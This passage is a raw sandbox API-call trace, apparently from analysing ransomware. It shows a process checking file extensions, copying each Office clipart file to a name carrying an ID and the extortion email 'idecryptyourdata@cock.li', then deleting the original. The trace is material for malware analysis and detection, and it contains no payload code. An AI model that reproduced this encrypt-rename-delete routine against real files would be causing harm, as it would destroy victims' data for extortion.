Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105526.wmf")) returned 1 [0182.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.178] lstrlenW (lpString=".doc") returned 4 [0182.178] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.178] lstrlenW (lpString=".docx") returned 5 [0182.178] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.178] lstrlenW (lpString=".pdf") returned 4 [0182.178] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.178] lstrlenW (lpString=".xls") returned 4 [0182.178] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.178] lstrlenW (lpString=".xlsx") returned 5 [0182.178] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.178] lstrlenW (lpString=".ppt") returned 4 [0182.178] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.178] lstrlenW (lpString=".zip") returned 4 [0182.178] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.178] lstrlenW (lpString=".rar") returned 4 [0182.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.178] lstrlenW (lpString=".bz2") returned 4 [0182.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.178] lstrlenW (lpString=".7z") returned 3 [0182.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.178] lstrlenW (lpString=".dbf") returned 4 [0182.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.178] lstrlenW (lpString=".1cd") returned 4 [0182.179] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.179] lstrlenW (lpString=".jpg") returned 4 [0182.179] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.179] lstrlenW (lpString=".doc") returned 4 [0182.179] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.179] lstrlenW (lpString=".docx") returned 5 [0182.179] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0182.179] lstrlenW (lpString=".pdf") returned 4 [0182.179] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.179] lstrlenW (lpString=".xls") returned 4 [0182.179] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.179] lstrlenW (lpString=".xlsx") returned 5 [0182.179] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0182.179] lstrlenW (lpString=".ppt") returned 4 [0182.179] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.179] lstrlenW (lpString=".zip") returned 4 [0182.179] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.179] lstrlenW (lpString=".rar") returned 4 [0182.179] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.179] lstrlenW (lpString=".bz2") returned 4 [0182.179] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.179] lstrlenW (lpString=".7z") returned 3 [0182.179] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.179] lstrlenW (lpString=".dbf") returned 4 [0182.180] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.180] lstrlenW (lpString=".1cd") returned 4 [0182.180] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105526.WMF") returned 68 [0182.180] lstrlenW (lpString=".jpg") returned 4 [0182.180] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.180] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.180] lstrlenW (lpString="J0105530.WMF") returned 12 [0182.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.181] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=7384) returned 1 [0182.181] CloseHandle (hObject=0x360) returned 1 [0182.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf")) returned 0x220 [0182.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.181] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.181] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.182] GetLastError () returned 0x0 [0182.182] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1cd8, lpOverlapped=0x0) returned 1 [0182.184] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1ce0, lpOverlapped=0x0) returned 1 [0182.185] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.185] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0182.186] SetEndOfFile (hFile=0x368) returned 1 [0182.186] CloseHandle (hObject=0x368) returned 1 [0182.186] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.186] SetEndOfFile (hFile=0x360) returned 1 [0182.187] CloseHandle (hObject=0x360) returned 1 [0182.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.187] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105530.wmf")) returned 1 [0182.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.188] lstrlenW (lpString=".doc") returned 4 [0182.188] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.188] lstrlenW (lpString=".docx") returned 5 [0182.188] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.188] lstrlenW (lpString=".pdf") returned 4 [0182.188] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.188] lstrlenW (lpString=".xls") returned 4 [0182.188] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.188] lstrlenW (lpString=".xlsx") returned 5 [0182.188] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.188] lstrlenW (lpString=".ppt") returned 4 [0182.188] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.188] lstrlenW (lpString=".zip") returned 4 [0182.188] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.188] lstrlenW (lpString=".rar") returned 4 [0182.188] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.188] lstrlenW (lpString=".bz2") returned 4 [0182.188] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.188] lstrlenW (lpString=".7z") returned 3 [0182.188] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.188] lstrlenW (lpString=".dbf") returned 4 [0182.188] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.188] lstrlenW (lpString=".1cd") returned 4 [0182.188] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.189] lstrlenW (lpString=".jpg") returned 4 [0182.189] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.189] lstrlenW (lpString=".doc") returned 4 [0182.189] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.189] lstrlenW (lpString=".docx") returned 5 [0182.189] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.189] lstrlenW (lpString=".pdf") returned 4 [0182.189] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.189] lstrlenW (lpString=".xls") returned 4 [0182.189] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.189] lstrlenW (lpString=".xlsx") returned 5 [0182.189] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.189] lstrlenW (lpString=".ppt") returned 4 [0182.189] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.189] lstrlenW (lpString=".zip") returned 4 [0182.189] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.189] lstrlenW (lpString=".rar") returned 4 [0182.189] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.189] lstrlenW (lpString=".bz2") returned 4 [0182.189] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.189] lstrlenW (lpString=".7z") returned 3 [0182.189] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.189] lstrlenW (lpString=".dbf") returned 4 [0182.189] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.190] lstrlenW (lpString=".1cd") returned 4 [0182.190] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.190] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105530.WMF") returned 68 [0182.190] lstrlenW (lpString=".jpg") returned 4 [0182.190] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.190] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.190] lstrlenW (lpString="J0105588.WMF") returned 12 [0182.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.191] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=21548) returned 1 [0182.191] CloseHandle (hObject=0x360) returned 1 [0182.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf")) returned 0x220 [0182.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.192] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.192] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.192] GetLastError () returned 0x0 [0182.192] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x542c, lpOverlapped=0x0) returned 1 [0182.542] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x5430, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x5430, lpOverlapped=0x0) returned 1 [0182.542] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.543] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0182.543] SetEndOfFile (hFile=0x368) returned 1 [0182.543] CloseHandle (hObject=0x368) returned 1 [0182.543] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.543] SetEndOfFile (hFile=0x360) returned 1 [0182.548] CloseHandle (hObject=0x360) returned 1 [0182.548] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.548] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105588.wmf")) returned 1 [0182.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.549] lstrlenW (lpString=".doc") returned 4 [0182.549] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.549] lstrlenW (lpString=".docx") returned 5 [0182.549] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.549] lstrlenW (lpString=".pdf") returned 4 [0182.549] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.549] lstrlenW (lpString=".xls") returned 4 [0182.549] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.549] lstrlenW (lpString=".xlsx") returned 5 [0182.549] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.549] lstrlenW (lpString=".ppt") returned 4 [0182.549] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.549] lstrlenW (lpString=".zip") returned 4 [0182.549] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.549] lstrlenW (lpString=".rar") returned 4 [0182.549] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.549] lstrlenW (lpString=".bz2") returned 4 [0182.549] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.549] lstrlenW (lpString=".7z") returned 3 [0182.549] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.549] lstrlenW (lpString=".dbf") returned 4 [0182.550] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.550] lstrlenW (lpString=".1cd") returned 4 [0182.550] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.550] lstrlenW (lpString=".jpg") returned 4 [0182.550] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.550] lstrlenW (lpString=".doc") returned 4 [0182.550] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.550] lstrlenW (lpString=".docx") returned 5 [0182.550] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.550] lstrlenW (lpString=".pdf") returned 4 [0182.550] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.550] lstrlenW (lpString=".xls") returned 4 [0182.550] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.550] lstrlenW (lpString=".xlsx") returned 5 [0182.550] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.550] lstrlenW (lpString=".ppt") returned 4 [0182.550] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.550] lstrlenW (lpString=".zip") returned 4 [0182.550] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.550] lstrlenW (lpString=".rar") returned 4 [0182.550] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.550] lstrlenW (lpString=".bz2") returned 4 [0182.550] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.550] lstrlenW (lpString=".7z") returned 3 [0182.551] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.551] lstrlenW (lpString=".dbf") returned 4 [0182.551] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.551] lstrlenW (lpString=".1cd") returned 4 [0182.551] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105588.WMF") returned 68 [0182.551] lstrlenW (lpString=".jpg") returned 4 [0182.551] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.551] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.551] lstrlenW (lpString="J0106572.WMF") returned 12 [0182.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.552] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=2148) returned 1 [0182.552] CloseHandle (hObject=0x360) returned 1 [0182.552] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf")) returned 0x220 [0182.552] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0182.552] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.552] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0182.553] GetLastError () returned 0x0 [0182.553] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x864, lpOverlapped=0x0) returned 1 [0182.555] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x870, lpOverlapped=0x0) returned 1 [0182.556] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0182.556] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0182.556] SetEndOfFile (hFile=0x368) returned 1 [0182.556] CloseHandle (hObject=0x368) returned 1 [0182.556] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0182.556] SetEndOfFile (hFile=0x360) returned 1 [0182.557] CloseHandle (hObject=0x360) returned 1 [0182.557] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.557] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106572.wmf")) returned 1 [0182.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106572.WMF") returned 68 [0182.558] lstrlenW (lpString=".doc") returned 4 [0182.558] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 